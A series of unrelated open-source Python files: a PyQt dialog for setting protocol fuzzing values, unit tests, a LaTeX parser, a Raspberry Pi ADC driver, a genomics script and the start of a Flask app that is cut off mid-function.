        self.ui.sBAddRangeEnd.valueChanged.connect(self.on_fuzzing_range_end_changed)
        self.ui.checkBoxLowerBound.stateChanged.connect(self.on_lower_bound_checked_changed)
        self.ui.checkBoxUpperBound.stateChanged.connect(self.on_upper_bound_checked_changed)
        self.ui.spinBoxLowerBound.valueChanged.connect(self.on_lower_bound_changed)
        self.ui.spinBoxUpperBound.valueChanged.connect(self.on_upper_bound_changed)
        self.ui.spinBoxRandomMinimum.valueChanged.connect(self.on_random_range_min_changed)
        self.ui.spinBoxRandomMaximum.valueChanged.connect(self.on_random_range_max_changed)
        self.ui.spinBoxFuzzMessage.valueChanged.connect(self.on_fuzz_msg_changed)
        self.ui.btnAddFuzzingValues.clicked.connect(self.on_btn_add_fuzzing_values_clicked)
        self.ui.comboBoxFuzzingLabel.editTextChanged.connect(self.set_current_label_name)

    def update_message_data_string(self):
        fuz_start = self.current_label_start
        fuz_end = self.current_label_end
        num_proto_bits = 10
        num_fuz_bits = 16

        proto_start = fuz_start - num_proto_bits
        preambel = "... "
        if proto_start <= 0:
            proto_start = 0
            preambel = ""

        proto_end = fuz_end + num_proto_bits
        postambel = " ..."
        if proto_end >= len(self.message_data) - 1:
            proto_end = len(self.message_data) - 1
            postambel = ""

        fuzamble = ""
        if fuz_end - fuz_start > num_fuz_bits:
            fuz_end = fuz_start + num_fuz_bits
            fuzamble = "..."

        self.ui.lPreBits.setText(preambel + self.message_data[proto_start:self.current_label_start])
        self.ui.lFuzzedBits.setText(self.message_data[fuz_start:fuz_end] + fuzamble)
        self.ui.lPostBits.setText(self.message_data[self.current_label_end:proto_end] + postambel)
        self.set_add_spinboxes_maximum_on_label_change()

    def closeEvent(self, event: QCloseEvent):
        settings.write("{}/geometry".format(self.__class__.__name__), self.saveGeometry())
        super().closeEvent(event)

    @pyqtSlot(int)
    def on_fuzzing_start_changed(self, value: int):
        self.ui.spinBoxFuzzingEnd.setMinimum(self.ui.spinBoxFuzzingStart.value())
        new_start = self.message.convert_index(value - 1, self.proto_view, 0, False)[0]
        self.current_label.start = new_start
        self.current_label.fuzz_values[:] = []
        self.update_message_data_string()
        self.fuzz_table_model.update()
        self.ui.tblFuzzingValues.resize_me()

    @pyqtSlot(int)
    def on_fuzzing_end_changed(self, value: int):
        self.ui.spinBoxFuzzingStart.setMaximum(self.ui.spinBoxFuzzingEnd.value())
        new_end = self.message.convert_index(value - 1, self.proto_view, 0, False)[1] + 1
        self.current_label.end = new_end
        self.current_label.fuzz_values[:] = []
        self.update_message_data_string()
        self.fuzz_table_model.update()
        self.ui.tblFuzzingValues.resize_me()

    @pyqtSlot(int)
    def on_combo_box_fuzzing_label_current_index_changed(self, index: int):
        self.fuzz_table_model.fuzzing_label = self.current_label
        self.fuzz_table_model.update()
        self.update_message_data_string()
        self.ui.tblFuzzingValues.resize_me()

        self.ui.spinBoxFuzzingStart.blockSignals(True)
        self.ui.spinBoxFuzzingStart.setValue(self.current_label_start + 1)
        self.ui.spinBoxFuzzingStart.blockSignals(False)

        self.ui.spinBoxFuzzingEnd.blockSignals(True)
        self.ui.spinBoxFuzzingEnd.setValue(self.current_label_end)
        self.ui.spinBoxFuzzingEnd.blockSignals(False)

    @pyqtSlot()
    def on_btn_add_row_clicked(self):
        self.current_label.add_fuzz_value()
        self.fuzz_table_model.update()

    @pyqtSlot()
    def on_btn_del_row_clicked(self):
        min_row, max_row, _, _ = self.ui.tblFuzzingValues.selection_range()
        self.delete_lines(min_row, max_row)

    @pyqtSlot(int, int)
    def delete_lines(self, min_row, max_row):
        if min_row == -1:
            self.current_label.fuzz_values = self.current_label.fuzz_values[:-1]
        else:
            self.current_label.fuzz_values = self.current_label.fuzz_values[:min_row] + self.current_label.fuzz_values[
                                                                                        max_row + 1:]

        _ = self.current_label  # if user deleted all, this will restore a fuzz value

        self.fuzz_table_model.update()

    @pyqtSlot()
    def on_remove_duplicates_state_changed(self):
        self.fuzz_table_model.remove_duplicates = self.ui.chkBRemoveDuplicates.isChecked()
        self.fuzz_table_model.update()
        self.remove_duplicates()

    @pyqtSlot()
    def set_add_spinboxes_maximum_on_label_change(self):
        nbits = self.current_label.end - self.current_label.start  # Use Bit Start/End for maximum calc.
        if nbits >= 32:
            nbits = 31
        max_val = 2 ** nbits - 1
        self.ui.sBAddRangeStart.setMaximum(max_val - 1)
        self.ui.sBAddRangeEnd.setMaximum(max_val)
        self.ui.sBAddRangeEnd.setValue(max_val)
        self.ui.sBAddRangeStep.setMaximum(max_val)
        self.ui.spinBoxLowerBound.setMaximum(max_val - 1)
        self.ui.spinBoxUpperBound.setMaximum(max_val)
        self.ui.spinBoxUpperBound.setValue(max_val)
        self.ui.spinBoxBoundaryNumber.setMaximum(int(max_val / 2) + 1)
        self.ui.spinBoxRandomMinimum.setMaximum(max_val - 1)
        self.ui.spinBoxRandomMaximum.setMaximum(max_val)
        self.ui.spinBoxRandomMaximum.setValue(max_val)

    @pyqtSlot(int)
    def on_fuzzing_range_start_changed(self, value: int):
        self.ui.sBAddRangeEnd.setMinimum(value)
        self.ui.sBAddRangeStep.setMaximum(self.ui.sBAddRangeEnd.value() - value)

    @pyqtSlot(int)
    def on_fuzzing_range_end_changed(self, value: int):
        self.ui.sBAddRangeStart.setMaximum(value - 1)
        self.ui.sBAddRangeStep.setMaximum(value - self.ui.sBAddRangeStart.value())

    @pyqtSlot()
    def on_lower_bound_checked_changed(self):
        if self.ui.checkBoxLowerBound.isChecked():
            self.ui.spinBoxLowerBound.setEnabled(True)
            self.ui.spinBoxBoundaryNumber.setEnabled(True)
        elif not self.ui.checkBoxUpperBound.isChecked():
            self.ui.spinBoxLowerBound.setEnabled(False)
            self.ui.spinBoxBoundaryNumber.setEnabled(False)
        else:
            self.ui.spinBoxLowerBound.setEnabled(False)

    @pyqtSlot()
    def on_upper_bound_checked_changed(self):
        if self.ui.checkBoxUpperBound.isChecked():
            self.ui.spinBoxUpperBound.setEnabled(True)
            self.ui.spinBoxBoundaryNumber.setEnabled(True)
        elif not self.ui.checkBoxLowerBound.isChecked():
            self.ui.spinBoxUpperBound.setEnabled(False)
            self.ui.spinBoxBoundaryNumber.setEnabled(False)
        else:
            self.ui.spinBoxUpperBound.setEnabled(False)

    @pyqtSlot()
    def on_lower_bound_changed(self):
        self.ui.spinBoxUpperBound.setMinimum(self.ui.spinBoxLowerBound.value())
        self.ui.spinBoxBoundaryNumber.setMaximum(math.ceil((self.ui.spinBoxUpperBound.value()
                                                            - self.ui.spinBoxLowerBound.value()) / 2))

    @pyqtSlot()
    def on_upper_bound_changed(self):
        self.ui.spinBoxLowerBound.setMaximum(self.ui.spinBoxUpperBound.value() - 1)
        self.ui.spinBoxBoundaryNumber.setMaximum(math.ceil((self.ui.spinBoxUpperBound.value()
                                                            - self.ui.spinBoxLowerBound.value()) / 2))

    @pyqtSlot()
    def on_random_range_min_changed(self):
        self.ui.spinBoxRandomMaximum.setMinimum(self.ui.spinBoxRandomMinimum.value())

    @pyqtSlot()
    def on_random_range_max_changed(self):
        self.ui.spinBoxRandomMinimum.setMaximum(self.ui.spinBoxRandomMaximum.value() - 1)

    @pyqtSlot()
    def on_btn_add_fuzzing_values_clicked(self):
        if self.ui.comboBoxStrategy.currentIndex() == 0:
            self.__add_fuzzing_range()
        elif self.ui.comboBoxStrategy.currentIndex() == 1:
            self.__add_fuzzing_boundaries()
        elif self.ui.comboBoxStrategy.currentIndex() == 2:
            self.__add_random_fuzzing_values()

    def __add_fuzzing_range(self):
        start = self.ui.sBAddRangeStart.value()
        end = self.ui.sBAddRangeEnd.value()
        step = self.ui.sBAddRangeStep.value()
        self.fuzz_table_model.add_range(start, end + 1, step)

    def __add_fuzzing_boundaries(self):
        lower_bound = -1
        if self.ui.spinBoxLowerBound.isEnabled():
            lower_bound = self.ui.spinBoxLowerBound.value()

        upper_bound = -1
        if self.ui.spinBoxUpperBound.isEnabled():
            upper_bound = self.ui.spinBoxUpperBound.value()

        num_vals = self.ui.spinBoxBoundaryNumber.value()
        self.fuzz_table_model.add_boundaries(lower_bound, upper_bound, num_vals)

    def __add_random_fuzzing_values(self):
        n = self.ui.spinBoxNumberRandom.value()
        minimum = self.ui.spinBoxRandomMinimum.value()
        maximum = self.ui.spinBoxRandomMaximum.value()
        self.fuzz_table_model.add_random(n, minimum, maximum)

    def remove_duplicates(self):
        if self.ui.chkBRemoveDuplicates.isChecked():
            for lbl in self.message.message_type:
                seq = lbl.fuzz_values[:]
                seen = set()
                add_seen = seen.add
                lbl.fuzz_values = [l for l in seq if not (l in seen or add_seen(l))]

    @pyqtSlot()
    def set_current_label_name(self):
        self.current_label.name = self.ui.comboBoxFuzzingLabel.currentText()
        self.ui.comboBoxFuzzingLabel.setItemText(self.ui.comboBoxFuzzingLabel.currentIndex(), self.current_label.name)

    @pyqtSlot(int)
    def on_fuzz_msg_changed(self, index: int):
        self.ui.comboBoxFuzzingLabel.setDisabled(False)

        sel_label_ind = self.ui.comboBoxFuzzingLabel.currentIndex()
        self.ui.comboBoxFuzzingLabel.blockSignals(True)
        self.ui.comboBoxFuzzingLabel.clear()

        if len(self.message.message_type) == 0:
            self.ui.comboBoxFuzzingLabel.setDisabled(True)
            return

        self.ui.comboBoxFuzzingLabel.addItems([lbl.name for lbl in self.message.message_type])
        self.ui.comboBoxFuzzingLabel.blockSignals(False)

        if sel_label_ind < self.ui.comboBoxFuzzingLabel.count():
            self.ui.comboBoxFuzzingLabel.setCurrentIndex(sel_label_ind)
        else:
            self.ui.comboBoxFuzzingLabel.setCurrentIndex(0)

        self.fuzz_table_model.fuzzing_label = self.current_label
        self.fuzz_table_model.update()
        self.update_message_data_string()

    @pyqtSlot()
    def on_btn_repeat_values_clicked(self):
        num_repeats, ok = QInputDialog.getInt(self, self.tr("How many times shall values be repeated?"),
                                              self.tr("Number of repeats:"), 1, 1)
        if ok:
            self.ui.chkBRemoveDuplicates.setChecked(False)
            min_row, max_row, _, _ = self.ui.tblFuzzingValues.selection_range()
            if min_row == -1:
                start, end = 0, len(self.current_label.fuzz_values)
            else:
                start, end = min_row, max_row + 1
            self.fuzz_table_model.repeat_fuzzing_values(start, end, num_repeats)


import os
import unittest

from vsg.rules import iteration_scheme
from vsg import vhdlFile
from vsg.tests import utils

sTestDir = os.path.dirname(__file__)

lFile, eError =vhdlFile.utils.read_vhdlfile(os.path.join(sTestDir,'rule_300_test_input.vhd'))

dIndentMap = utils.read_indent_file()

lExpected = []
lExpected.append('')
utils.read_file(os.path.join(sTestDir, 'rule_300_test_input.fixed.vhd'), lExpected)


class test_iteration_scheme_rule(unittest.TestCase):

    def setUp(self):
        self.oFile = vhdlFile.vhdlFile(lFile)
        self.assertIsNone(eError)
        self.oFile.set_indent_map(dIndentMap)

    def test_rule_300(self):
        oRule = iteration_scheme.rule_300()
        self.assertTrue(oRule)
        self.assertEqual(oRule.name, 'iteration_scheme')
        self.assertEqual(oRule.identifier, '300')

        lExpected = [13, 17]

        oRule.analyze(self.oFile)
        self.assertEqual(lExpected, utils.extract_violation_lines_from_violation_object(oRule.violations))

    def test_fix_rule_300(self):
        oRule = iteration_scheme.rule_300()

        oRule.fix(self.oFile)

        lActual = self.oFile.get_lines()

        self.assertEqual(lExpected, lActual)

        oRule.analyze(self.oFile)
        self.assertEqual(oRule.violations, [])

#
# LMirror is Copyright (C) 2010 Robert Collins <robertc@robertcollins.net>
# 
# LMirror is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
# 
# This program is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE.  See the GNU General Public License for more details.
# 
# You should have received a copy of the GNU General Public License along with
# this program.  If not, see <http://www.gnu.org/licenses/>.
# 
# In the LMirror source tree the file COPYING.txt contains the GNU General Public
# License version 3.
# 

"""Tests for logging support code."""

from StringIO import StringIO
import logging
import os.path
import time

from l_mirror import logging_support
from l_mirror.tests import ResourcedTestCase
from l_mirror.tests.logging_resource import LoggingResourceManager
from l_mirror.tests.stubpackage import TempDirResource


class TestLoggingSetup(ResourcedTestCase):

    resources = [('logging', LoggingResourceManager())]

    def test_configure_logging_sets_converter(self):
        out = StringIO()
        c_log, f_log, formatter = logging_support.configure_logging(out)
        self.assertEqual(c_log, logging.root.handlers[0])
        self.assertEqual(f_log, logging.root.handlers[1])
        self.assertEqual(None, c_log.formatter)
        self.assertEqual(formatter, f_log.formatter)
        self.assertEqual(time.gmtime, formatter.converter)
        self.assertEqual("%Y-%m-%d %H:%M:%SZ", formatter.datefmt)
        self.assertEqual(logging.StreamHandler, c_log.__class__)
        self.assertEqual(out, c_log.stream)
        self.assertEqual(logging.FileHandler, f_log.__class__)
        self.assertEqual(os.path.expanduser("~/.cache/lmirror/log"), f_log.baseFilename)

    def test_can_supply_filename_None(self):
        out = StringIO()
        c_log, f_log, formatter = logging_support.configure_logging(out, None)
        self.assertEqual(None, f_log)

# -*- coding: utf8 -*-

###########################################################################
#   This is the package latexparser
#
#   This program is free software: you can redistribute it and/or modify
#   it under the terms of the GNU General Public License as published by
#   the Free Software Foundation, either version 3 of the License, or
#   (at your option) any later version.
#
#   This program is distributed in the hope that it will be useful,
#   but WITHOUT ANY WARRANTY; without even the implied warranty of
#   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#   GNU General Public License for more details.
#
#   You should have received a copy of the GNU General Public License
#   along with this program.  If not, see <http://www.gnu.org/licenses/>.
###########################################################################

# copyright (c) Laurent Claessens, 2010,2012-2016
# email: laurent@claessens-donadello.eu

import codecs
from latexparser.InputPaths import InputPaths

class Occurrence(object):
    """
    self.as_written : the code as it appears in the file, including \MyMacro, including the backslash.
    self.position : the position at which this occurrence appears. 
        Example, if we look at the LatexCode

        Hello word, \MyMacro{first} 
        and then \MyMacro{second}

        the first occurrence of \MyMacro has position=12
    """
    def __init__(self,name,arguments,as_written="",position=0):
        self.arguments = arguments
        self.number_of_arguments = len(arguments)
        self.name = name
        self.as_written = as_written
        self.arguments_list = arguments
        self.position = position
    def configuration(self):
        r"""
        Return the way the arguments are separated in as_written.
 
        Example, if we have
        \MyMacro<space>{A}<tab>{B}
        {C},
        we return the list
        ["<space>","tab","\n"]

        The following has to be true:
        self.as_written == self.name+self.configuration()[0]+self.arguments_list[0]+etc.
        """
        l=[]
        a = self.as_written.split(self.name)[1]
        for arg in self.arguments_list:
            split = a.split("{"+arg+"}")
            separator=split[0]
            try:
                a=split[1]
            except IndexError:
                print(self.as_written)
                raise
            l.append(separator)
        return l
    def change_argument(self,num,func):
        r"""
        Apply the function <func> to the <n>th argument of self. Then return a new object.
        """
        n=num-1     # Internally, the arguments are numbered from 0.
        arguments=self.arguments_list
        configuration=self.configuration()
        arguments[n]=func(arguments[n])
        new_text=self.name
        if len(arguments) != len(configuration):
            print("Error : length of the configuration list has to be the same as the number of arguments")
            raise ValueError
        for i in range(len(arguments)):
            new_text=new_text+configuration[i]+"{"+arguments[i]+"}"
        return Occurrence(self.name,arguments,new_text,self.position)
    def analyse(self):
        return globals()["Occurrence_"+self.name[1:]](self)     # We have to remove the initial "\" in the name of the macro.
    def __getitem__(self,a):
        return self.arguments[a]
    def __str__(self):
        return self.as_written

class Occurrence_newlabel(object):
    r"""
    takes an occurrence of \newlabel and creates an object which contains the information.

    In the self.section_name we remove "\relax" from the string.
    """
    def __init__(self,occurrence):
        self.occurrence = occurrence
        self.arguments = self.occurrence.arguments
        if len(self.arguments) == 0 :
            self.name = "Non interesting; probably the definition"
            self.listoche = [None,None,None,None,None]
            self.value,self.page,self.section_name,self.fourth,self.fifth=(None,None,None,None,None)
        else :
            self.name = self.arguments[0][0]
            self.listoche = [a[0] for a in SearchArguments(self.arguments[1][0],5)[0]]
            self.value = self.listoche[0]
            self.page = self.listoche[1]
            self.section_name = self.listoche[2].replace(r"\relax","")
            self.fourth = self.listoche[3]      # I don't know the role of the fourth argument of \newlabel
            self.fifth = self.listoche[4]       # I don't know the role of the fifth argument of \newlabel

class Occurrence_addInputPath(object):
    def __init__(self,Occurrence):
        self.directory=Occurrence[0]

class Occurrence_cite(object):
    def __init__(self,occurrence):
        self.label = occurrence[0]
    def entry(self,codeBibtex):
        return codeBibtex[self.label]

class Occurrence_newcommand(object):
    def __init__(self,occurrence):
        self.occurrence = occurrence
        self.number_of_arguments = 0
        if self.occurrence[1][1] == "[]":
            self.number_of_arguments = self.occurrence[1][0]
        self.name = self.occurrence[0][0]#[0]
        self.definition = self.occurrence[-1][0]

class Occurrence_label(object):
    def __init__(self,occurrence):
        self.occurrence=occurrence
        self.label=self.occurrence.arguments[0]
class Occurrence_ref(object):
    def __init__(self,occurrence):
        self.occurrence=occurrence
        self.label=self.occurrence.arguments[0]
class Occurrence_eqref(object):
    def __init__(self,occurrence):
        self.occurrence=occurrence
        self.label=self.occurrence.arguments[0]

class Occurrence_input(Occurrence):
    def __init__(self,occurrence):
        Occurrence.__init__(self,occurrence.name,occurrence.arguments,as_written=occurrence.as_written,position=occurrence.position)
        self.occurrence = occurrence
        self.filename = self.occurrence[0]
        self.input_paths=InputPaths()
        self._file_content=None        # Make file_content "lazy"
    def file_content(self,input_paths=None):
        r"""
        return the content of the file corresponding to this occurrence of
        \input.
        This is not recursive.

        - 'input_path' is the list of paths in which we can search for files.

        See the macro `\addInputPath` in the file
        https://github.com/LaurentClaessens/mazhe/blob/master/configuration.tex
        """
        import os.path

        # Memoize
        if self._file_content is not None :
            return self._file_content

        # At least, we are searching in the current directory :
        if input_paths is None :
            raise # Just to know who should do something like that

        # Creating the filename
        filename=self.filename
        strict_filename = filename
        if "." not in filename:
            strict_filename=filename+".tex"
    
        # Searching for the correct file in the subdirectories
        fn=input_paths.get_file(strict_filename)
        try:
            # Without [:-1] I got an artificial empty line at the end. 
            text = "".join( codecs.open(fn,"r",encoding="utf8") )[:-1]   
        except IOError :
            print("Warning : file %s not found."%strict_filename)
            raise
        self._file_content=text
        return self._file_content

#!/usr/bin/env python
#
# MCP320x
#
# Author: Maurik Holtrop
#
# This module interfaces with the MCP300x or MCP320x family of chips. These
# are 10-bit and 12-bit ADCs respectively.  The x number indicates the number
# of multiplexed analog inputs:  2 (MCP3202), 4 (MCP3204) or 8 (MCP3208)
# Communications with this chip are over the SPI protocol.
# See: https://en.wikipedia.org/wiki/Serial_Peripheral_Interface_Bus
#
# The version of the code has two SPI interfaces: the builtin hardware
# SPI interface on the RPI, or a "bit-banged" GPIO version.
#
# Bit-Bang GPIO:
#   We emulate a SPI port in software using the GPIO lines.
#   This is a bit slower than the hardware interface, but it is far more
#   clear what is going on, plus the RPi has only one SPI device.
#   Connections: RPi GPIO to  MCP320x
#              CS_bar_pin = CS/SHDN
#              CLK_pin    = CLK
#              MOSI_pin   = D_in
#              MISO_pin   = D_out
#
# Hardware SPI:
#   This uses the builtin hardware on the RPi. You need to enable this with the
#   raspi-config program first. The data rate can be up to 1MHz.
#   Connections: RPi pins to MCP320x
#              CE0 or CE1 = CS/SHDN  (chip select) set CS_bar = 0 or 1
#              SCK        = CLK      set CLK_pin  = 1000000 (transfer speed)
#              MOSI       = D_in     set MOSI_pin = 0
#              MISO       = D_out    set MISO_pin = 0

# The SPI protocol simulated here is MODE=0, CPHA=0, which has a positive polarity clock,
# (the clock is 0 at rest, active at 1) and a positive phase (0 to 1 transition) for reading
# or writing the data. Thus corresponds to the specifications of the MCP320x chips.
#
# From MCP3208 datasheet:
# Outging data : MCU latches data to A/D converter on rising edges of SCLK
# Incoming data: Data is clocked out of A/D converter on falling edges, so should be read on rising edge.
try:
    import RPi.GPIO as GPIO
except ImportError as error:
    pass
try:
    import Adafruit_BBIO as GPIO
except ImportError as error:
    pass

try:
    import spidev
except ImportError as error:
    pass

from DevLib.MyValues import MyValues


class MCP320x:
    """This is an class that implements an interface to the MCP320x ADC chips.
    Standard is the MCP3208, but is will also work wiht the MCP3202, MCP3204, MCP3002, MCP3004 and MCP3008."""

    def __init__(self, cs_bar_pin, clk_pin=1000000, mosi_pin=0, miso_pin=0, chip='MCP3208',
                 channel_max=None, bit_length=None, single_ended=True):
        """Initialize the code and set the GPIO pins.
        The last argument, ch_max, is 2 for the MCP3202, 4 for the
        MCP3204 or 8 for the MCS3208."""

        self._CLK = clk_pin
        self._MOSI = mosi_pin
        self._MISO = miso_pin
        self._CS_bar = cs_bar_pin

        chip_dictionary = {
                "MCP3202": (2, 12),
                "MCP3204": (4, 12),
                "MCP3208": (8, 12),
                "MCP3002": (2, 10),
                "MCP3004": (4, 10),
                "MCP3008": (8, 10)
        }

        if chip in chip_dictionary:
            self._ChannelMax = chip_dictionary[chip][0]
            self._BitLength = chip_dictionary[chip][1]
        elif chip is None and (channel_max is not None) and (bit_length is not None):
            self._ChannelMax = channel_max
            self._BitLength = bit_length
        else:
            print("Unknown chip: {} - Please re-initialize.")
            self._ChannelMax = 0
            self._BitLength = 0
            return

        self._SingleEnded = single_ended
        self._Vref = 3.3
        self._values = MyValues(self.read_adc, self._ChannelMax)
        self._volts = MyValues(self.read_volts, self._ChannelMax)

        # This is used to speed up the SPIDEV communication. Send out MSB first.
        # control[0] - bit7-3: upper 5 bits 0, because we can only send 8 bit sequences.
        #            - bit2   : Start bit - starts conversion in ADCs
        #            - bit1   : Select single_ended=1 or differential=0
        #            - bit0   : D2 high bit of channel select.
        # control[1] - bit7   : D1 middle bit of channel select.
        #            - bit6   : D0 low bit of channel select.
        #            - bit5-0 : Don't care.
        if self._SingleEnded:
            self._control0 = [0b00000110, 0b00100000, 0]  # Pre-compute part of the control word.
        else:
            self._control0 = [0b00000100, 0b00100000, 0]  # Pre-compute part of the control word.

        if self._MOSI > 0:  # Bing Bang mode
            assert self._MISO != 0 and self._CLK < 32
            if GPIO.getmode() != 11:
                GPIO.setmode(GPIO.BCM)        # Use the BCM numbering scheme

            GPIO.setup(self._CLK, GPIO.OUT)     # Setup the ports for in and output
            GPIO.setup(self._MOSI, GPIO.OUT)
            GPIO.setup(self._MISO, GPIO.IN)
            GPIO.setup(self._CS_bar, GPIO.OUT)

            GPIO.output(self._CLK, 0)           # Set the clock low.
            GPIO.output(self._MOSI, 0)          # Set the Master Out low
            GPIO.output(self._CS_bar, 1)        # Set the CS_bar high

        else:
            self._dev = spidev.SpiDev(0, self._CS_bar)  # Start a SpiDev device
            self._dev.mode = 0                          # Set SPI mode (phase)
            self._dev.max_speed_hz = self._CLK          # Set the data rate
            self._dev.bits_per_word = 8                 # Number of bit per word. ALWAYS 8

    def __del__(self):
        """ Cleanup the GPIO before being destroyed """
        if self._MOSI > 0:
            GPIO.cleanup(self._CS_bar)
            GPIO.cleanup(self._CLK)
            GPIO.cleanup(self._MOSI)
            GPIO.cleanup(self._MISO)

    def get_channel_max(self):
        """Return the maximum number of channels"""
        return self._ChannelMax

    def get_bit_length(self):
        """Return the number of bits that will be read"""
        return self._BitLength

    def get_value_max(self):
        """Return the maximum value possible for an ADC read"""
        return 2 ** self._BitLength - 1

    def send_bit(self, bit):
        """ Send out a single bit, and pulse clock."""
        if self._MOSI == 0:
            return
        #
        # The input is read on the rising edge of the clock.
        #
        GPIO.output(self._MOSI, bit)  # Set the bit.
        GPIO.output(self._CLK, 1)     # Rising edge sends data
        GPIO.output(self._CLK, 0)     # Return clock to zero.

    def read_bit(self):
        """ Read a single bit from the ADC and pulse clock."""
        if self._MOSI == 0:
            return 0
        #
        # The output is going out on the falling edge of the clock,
        # and is to be read on the rising edge of the clock.

        # Clock should be already low, and data should already be set.
        GPIO.output(self._CLK, 1)     # Set the clock high. Ready to read.
        bit = GPIO.input(self._MISO)  # Read the bit.
        GPIO.output(self._CLK, 0)     # Return clock low, next bit will be set.

        return bit

    def read_adc(self, channel):
        """This reads the actual ADC value, after connecting the analog multiplexer to
        the desired channel.
        ADC value is returned at a n-bit integer value, with n=10 or 12 depending on the chip.
        The value can be converted to a voltage with:
           volts = data*Vref/(2**n-1)"""
        if channel < 0 or channel >= self._ChannelMax:
            print("Error - chip does not have channel = {}".format(channel))

        if self._MOSI == 0:
            # SPIdev Code
            # This builds up the control word, which selects the channel
            # and sets single/differential more.
            control = [self._control0[0] + ((channel & 0b100) >> 2), self._control0[1]+((channel & 0b011) << 6), 0]
            dat = self._dev.xfer(control)
            value = (dat[1] << 8)+dat[2]  # Unpack the two 8-bit words to a single integer.
            return value

        else:
            # Bit Bang code.
            # To read out this chip you need to send:
            # 1 - start bit
            # 2 - Single ended (1) or differential (0) mode
            # 3 - Channel select: 1 bit for x=2 or 3 bits for x=4,8
            # 4 - MSB first (1) or LSB first (0)
            #
            # Start of sequence sets CS_bar low, and sends sequence
            #
            GPIO.output(self._CLK, 0)                # Make sure clock starts low.
            GPIO.output(self._MOSI, 0)
            GPIO.output(self._CS_bar, 0)             # Select the chip.
            self.send_bit(1)                        # Start bit = 1
            self.send_bit(self._SingleEnded)   # Select single or differential
            if self._ChannelMax > 2:
                self.send_bit(int((channel & 0b100) > 0))  # Send high bit of channel = DS2
                self.send_bit(int((channel & 0b010) > 0))  # Send mid  bit of channel = DS1
                self.send_bit(int((channel & 0b001) > 0))  # Send low  bit of channel = DS0
            else:
                self.send_bit(channel)

            self.send_bit(0)                       # MSB First (for MCP3x02) or don't care.

            # The clock is currently low, and the dummy bit = 0 is on the output of the ADC
            #
            self.read_bit()  # Read the bit.

            data = 0
            for i in range(self._BitLength):
                # Note you need to shift left first, or else you shift the last bit (bit 0)
                # to the 1 position.
                data <<= 1
                bit = self.read_bit()
                data += bit

            GPIO.output(self._CS_bar, 1)  # Unselect the chip.

            return data

    def read_volts(self, channel):
        """Read the ADC value from channel and convert to volts, assuming that Vref is set correctly. """
        return self._Vref * self.read_adc(channel) / self.get_value_max()

    def fast_read_adc0(self):
        """This reads the actual ADC value of channel 0, with as little overhead as possible.
        Use with SPIDEV ONLY!!!!
        returns: The ADC value as an n-bit integer value, with n=10 or 12 depending on the chip."""

        dat = self._dev.xfer(self._control0)
        value = (dat[1] << 8) + dat[2]
        return value

    @property
    def values(self):
        """ADC values presented as a list."""
        return self._values

    @property
    def volts(self):
        """ADC voltages presented as a list"""
        return self._volts

    @property
    def accuracy(self):
        """The fractional voltage of the least significant bit. """
        return self._Vref / float(self.get_value_max())

    @property
    def vref(self):
        """Reference voltage used by the chip. You need to set this. It defaults to 3.3V"""
        return self._Vref

    @vref.setter
    def vref(self, vr):
        self._Vref = vr


def main(argv):
    """Test code for the MCP320x driver. This assumes you are using a MCP3208
    If no arguments are supplied, then use SPIdev for CE0 and read channel 0"""

    if len(argv) < 3:
        print("Args : ", argv)
        cs_bar = 0
        clk_pin = 1000000
        mosi_pin = 0
        miso_pin = 0
        if len(argv) < 2:
            channel = 0
        else:
            channel = int(argv[1])
            
    elif len(argv) < 6:
        print("Please supply: cs_bar_pin clk_pin mosi_pin miso_pin channel")
        sys.exit(1)

    else:
        cs_bar = int(argv[1])
        clk_pin = int(argv[2])
        mosi_pin = int(argv[3])
        miso_pin = int(argv[4])
        channel = int(argv[5])

    adc_chip = MCP320x(cs_bar, clk_pin, mosi_pin, miso_pin)
    try:
        while True:
            value = adc_chip.read_adc(channel)
            print("{:4d}".format(value))
            time.sleep(0.1)
    except KeyboardInterrupt:
        sys.exit(0)


if __name__ == '__main__':
    import sys
    import time
    main(sys.argv)

# __init__.py
# Copyright (C) 2006, 2007, 2008, 2009, 2010 Michael Bayer mike_mp@zzzcomputing.com
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php


__version__ = '0.3.4'


#!/usr/bin/python

import sys

print "divsum_analysis.py DivsumFile NumberOfNucleotides"

try:
    file = sys.argv[1]
except:
    file = raw_input("Introduce RepeatMasker's Divsum file: ")

try:
    nucs = sys.argv[2]
except:
    nucs = raw_input("Introduce number of analysed nucleotides: ")

nucs = int(nucs)

data = open(file).readlines()

s_matrix = data.index("Coverage for each repeat class and divergence (Kimura)\n")

matrix = []

elements = data[s_matrix+1]
elements = elements.split()
for element in elements[1:]:
    matrix.append([element,[]])
n_el = len(matrix)

for line in data[s_matrix+2:]:
#    print line
    info = line.split()
    info = info[1:]
    for n in range(0,n_el):
        matrix[n][1].append(int(info[n]))

abs = open(file+".abs", "w")
rel = open(file+".rel", "w")
        
for n in range(0,n_el):
    abs.write("%s\t%s\n" % (matrix[n][0], sum(matrix[n][1])))
    rel.write("%s\t%s\n" % (matrix[n][0], round(1.0*sum(matrix[n][1])/nucs,100)))


"""
Copyright 2014 Jason Heeris, jason.heeris@gmail.com

This file is part of the dungeon excavator web interface ("webcavate").

Webcavate is free software: you can redistribute it and/or modify it under the
terms of the GNU General Public License as published by the Free Software
Foundation, either version 3 of the License, or (at your option) any later
version.

Webcavate is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with
webcavate. If not, see <http://www.gnu.org/licenses/>.
"""
import argparse
import uuid

from flask import Flask, render_template, request, make_response, redirect, url_for, flash

from dungeon.excavate import render_room

HELP_TEXT = """\
Web interface to the dungeon excavator."""

app = Flask('dungeon.web')
app.secret_key = str(uuid.uuid4())

@app.route("/")
def root():
    """ Web interface landing page. """
    return render_template('index.html')


@app.route("/error")
def error():
    """ Display errors. """
    return render_template('error.html')


def make_map(request, format):
    tile_size = int(request.form['size'])
    wall_file = request.files['walls']
    floor_file = request.files['floor']
    floorplan_file = request.files['floorplan']

    try:
        room_data, content_type = render_room(
            floor_file.read(),
            wall_file.read(),
            floorplan_file.read(),
            tile_size,
            format
        )
    except ValueError as ve:
        flash(str(ve))
